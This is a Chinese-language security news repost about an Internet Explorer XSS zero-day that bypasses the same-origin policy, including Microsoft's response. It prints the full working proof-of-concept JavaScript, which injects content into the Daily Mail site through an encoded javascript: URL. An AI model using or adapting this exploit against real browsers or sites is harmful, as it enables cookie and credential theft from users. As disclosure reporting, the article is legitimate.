最新XSS 0day漏洞來襲,影響最新版本IE瀏覽器(含POC)

jopen 10年前發布 | 8K 次閱讀 漏洞

原文  http://www.freebuf.com/news/58376.html

最新XSS 0day漏洞來襲,影響最新版本IE瀏覽器(含POC)

安全研究人員近日發現了一個嚴重的XSS 0day漏洞,該漏洞可影響最新版本的IE瀏覽器,將用戶暴露在被攻擊和身份盜竊的危險之中。

漏洞信息

該漏洞能夠影響完全修復過的IE瀏覽器,黑客可以利用該漏洞盜取用戶的敏感數據(例如登錄憑證),并能向瀏覽器會話注入惡意內容。

攻擊者利用該XSS漏洞可以繞過同源策略(SOP)。同源策略是web應用中一個基本的安全模型,用來保護用戶的瀏覽體驗。

同源策略在維基百科上的解釋為:

“該策略允許同一站點(系統、主機名和端口號的組合)頁面上的腳本訪問彼此的DOM,而沒有特定的限制,但阻止訪問不同站點上的DOM。”

漏洞POC

上周Deusen公布了一個 POC利用 ,以此演示當用戶使用完全修補的IE瀏覽器訪問特定的網頁時如何繞過SOP。該Demo向《每日郵報》官方網站中注入了“Hacked by Deusen”的內容。

最新XSS 0day漏洞來襲,影響最新版本IE瀏覽器(含POC)

以同樣的方式,一旦攻擊者登錄網站,他們就可以冒充受害者從該網站盜取身份驗證cookie。一旦得到cookie,攻擊者就可以訪問某些限制區 域,而正常情況下該區域只有受害者能訪問,包括信用卡數據、瀏覽歷史和其他機密數據。此外,釣魚網站也可以利用該漏洞誘騙網民泄露他們在敏感網站的登錄密 碼。

下面是繞過IE瀏覽器中同源策略所使用的代碼:

function go()
{
   w=window.frames[0];
   w.setTimeout("alert(eval('x=top.frames[1];r=confirm(\\'Closethis window after 3seconds...\\');x.location=\\'javascript:%22%3Cscript%3Efunction%20a()%7Bw.document.body.innerHTML%3D%27%3Ca%20style%3Dfont-size%3A50px%3EHacked%20by%20Deusen%3C%2Fa%3E%27%3B%7D%20function%20o()%7Bw%3Dwindow.open(%27http%3A%2F%2Fwww.dailymail.co.uk%27%2C%27_blank%27%2C%27top%3D0%2C%20left%3D0%2C%20width%3D800%2C%20height%3D600%2C%20location%3Dyes%2C%20scrollbars%3Dyes%27)%3BsetTimeout(%27a()%27%2C7000)%3B%7D%3C%2Fscript%3E%3Ca%20href%3D%27javascript%3Ao()%3Bvoid(0)%3B%27%3EGo%3C%2Fa%3E%22\\';'))",1);
}
setTimeout("go()",1000);

微軟回應

微軟表示已經開始修復該漏洞。微軟確認目前還沒有收到大量漏洞利用的案例。

“我們還沒聽說這個漏洞被大量利用,目前我們正在進行安全更新。另外,要利用該漏洞,攻擊者需要首先誘導用戶進入一個惡意網站,這一步經常通過網絡釣魚來實現。不過,在新版本的IE瀏覽器中默認開啟的SmartScreen功能,能夠保護用戶免受釣魚網站危害。
我們將繼續鼓勵用戶不要打開來源不明的的鏈接,同時也不要訪問不可信的網站。并且,為了保護用戶的信息,我們建議在離開網站時要及時注銷登錄的賬號。”

微軟解釋說,攻擊者必須首先誘導受害者訪問一個惡意網站,這一般可以通過幾種方式簡單地實現:例如,可以通過垃圾郵件分享一個鏈接,或者通過社交網絡來實現。

接下來,讓我們共同等待微軟修復漏洞吧。

[參考來源 SecurityAffairs ,轉載請注明來自FreeBuf黑客與極客(FreeBuf.COM)]

</div> </div>

 本文由用戶 jopen 自行上傳分享,僅供網友學習交流。所有權歸原作者,若您的權利被侵害,請聯系管理員。
 轉載本站原創文章,請注明出處,并保留原始鏈接、圖片水印。
 本站是一個以用戶分享為主的開源技術平臺,歡迎各類分享!